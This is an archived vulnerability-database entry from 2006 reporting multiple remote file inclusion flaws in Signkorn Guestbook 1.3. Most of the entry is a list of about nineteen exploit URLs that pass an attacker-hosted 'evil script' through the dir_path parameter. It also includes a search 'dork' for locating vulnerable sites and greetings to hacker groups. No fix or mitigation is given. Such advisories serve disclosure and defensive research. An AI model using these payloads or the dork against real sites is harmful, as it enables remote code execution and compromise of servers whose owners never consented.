Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

2006-09-18T00:00:00
ID SECURITYVULNS:DOC:14302
Type securityvulns
Reporter Securityvulns
Modified 2006-09-18T00:00:00

Description

Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

Discovred By : ThE__LeO ;

Software : Signkorn Guestbook v 1.3 ;

Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

Exploit : http://Www.Example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;

                 http://Www.Example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
                 http://Www.Example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
                                     http://Www.Example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
                 http://Www.Example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;

Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47],Arabian-FighterZ, lhma9, Death & All Moroccan & Arab Hackers ;

Safi Braka yallah Tla7 ;)